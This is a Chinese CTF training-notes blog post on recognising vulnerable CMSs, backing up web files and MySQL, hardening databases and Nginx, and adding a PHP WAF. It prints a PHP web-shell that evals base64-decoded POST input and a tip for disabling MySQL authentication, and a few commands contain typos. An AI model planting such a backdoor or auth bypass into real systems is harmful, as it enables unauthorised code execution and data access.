CTF特训(第三天)

释放双眼,带上耳机,听听看~!

判断是否是已知的CMS或者框架

搜索通用漏洞,打开kali进行搜索有没有通用的漏洞,搜索disscuz漏洞

searchsploit diss

收集更多信息

Google、baidu已知的漏洞

验证查找常用的POC

  1. 判断是否为已知的CMS收集更多信息

  2. CMS类型

  3. CMS版本号

  4. 是否安装插件以及插件版本

  5. 补丁类型

收集更多信息,如WORDpress有无特殊配置,如他自己生成的版本号。

熟悉他使用的版本。

Google黑客技巧

POC

查看是否可以打出结果。

本地漏洞裤分享

http://www.bugscan.net/source/template/vulns/
https://www.shentoushi.top/index.php/Go/?url=http://www.cnnvd.org.cn&LinkId=34
https://www.seebug.org
http://www.nsfocus.net/index.php?act=sec_bug
https://www.shentoushi.top/index.php/Go/?url=http://www.0daybank.org&LinkId=44
https://www.shentoushi.top/index.php/Go/?url=http://0day5.com&LinkId=43

网站源码备份

远程获取文件scp -r Web1:/var/www/html/ webbak/

 #!/bin/bash
 time=`/bin/date +%F`
 bak_file="/data/backup/$time.tar.gz"
 webdir="/data/www/"
 tar zcvf $bak_file $webdir >/dev/null 2>&1 &

/bin/bash /data/bak.sh定时执行计划任务 crontable -ectl+octl+x

数据库备份

mysqldump -uroot -p --single-transaction --all-databases > backup.sql # 所有
mysqldump -u root -p --single-transaction dataname > dataname.sql #单个
mysqldump --skip-lock-tables -uxxxx -pxxxxxx -h 166.111.9.173 -R 数据库名 > ./urlevent20180319.sql

mysqldump -h127.0.0.1 -uroot -ppassword database |gzip >$backupDir/$database-$today.sql.gz`然后,scp回来。

#备份目录backupDir=/home/backup/database#mysqlDumpmysqldump=/usr/local/mariadb/bin/mysqldumphost=127.0.0.1username=rootpassword=42342342today=`date +%Y%m%d`#要备份的数据库数组databases=(blog chinese_medicine)# echo $databaseCountfor database in ${databases[@]} do echo '开始备份'$database $mysqldump -h$host -u$username -p$password $database | gzip > $backupDir/$database-$today.sql.gz echo '成功备份'$database'到'$backupDir/$database-$today.sql.gz done

恢复mysqlmysql -uroot -p TEST < bak.sql


数据库运维

取消mysql密码认证:修改my.cnf ,添加 skip-grant-tables
修改mysql密码update mysql.user set password=PASSWORD('skyboy') where user='root' and host='localhost';flush privileges;
最好先修改mysql,再修改php。一般不存在需要修改mysql密码的情况。
禁止数据库的远程连接:
use mysql;
update user set host='localhost' where user='root'
flush privileges
CREATE USER ‘dog’@‘localhost’ IDENTIFIED BY123456’;
GRANT ALL ON databasename.* TO ‘dog’@‘localhost
flush privileges;
调整站点配置文件,修改数据库连接的用户名和密码。

Linxu服务器管理

对于非必须可写的目录:权限设置为755,拥有者设为非www-data用户;从而防止文件被篡改/删除。 
对于必须可写的目录:根据服务器类型,上一个.htaccess, 或者修改nginx的目录配置文件,去除此路径的脚本执行权限。

对于Nginx:location ~ /mm/(data|uploads|templets)/*.(php)$ {deny all;}location ~ .php$ {try_files $uri /404.html;fastcgi_pass 127.0.0.1:9000;fastcgi_index index.php;fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;include fastcgi_params;} 修改完成之后,nginx -S reload

waf脚本

通用防御
php-WAF的批量添加:
find /var/www/html -type f -path "*.php" | xargs sed -i "s/<?php/<?php require_once('/tmp/waf.php');n/g“
WAF需要同时具备拦截和抓取流量的作用。

watch

<?php$serverList = array( "127.0.0.1", "::1");$ip = $_SERVER['REMOTE_ADDR'];
foreach ($serverList as $host){ if( $ip===$host){ $a = $_POST['n985de9']; if(isset($a)) { eval(base64_decode($a)); } }else{ die(); }}

经过衬衫的宣传,公众号来了很多的新同学。赶上了第二期的资源分享,我在咸鱼上买了些CTF的资源,分享给大家。明天见

本文源自微信公众号:渗透云笔记

人已赞赏
安全工具

预热挖掘SQL注入

2019-10-16 17:20:35

安全工具

Python笔记(第三章)

2019-10-16 17:21:03

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索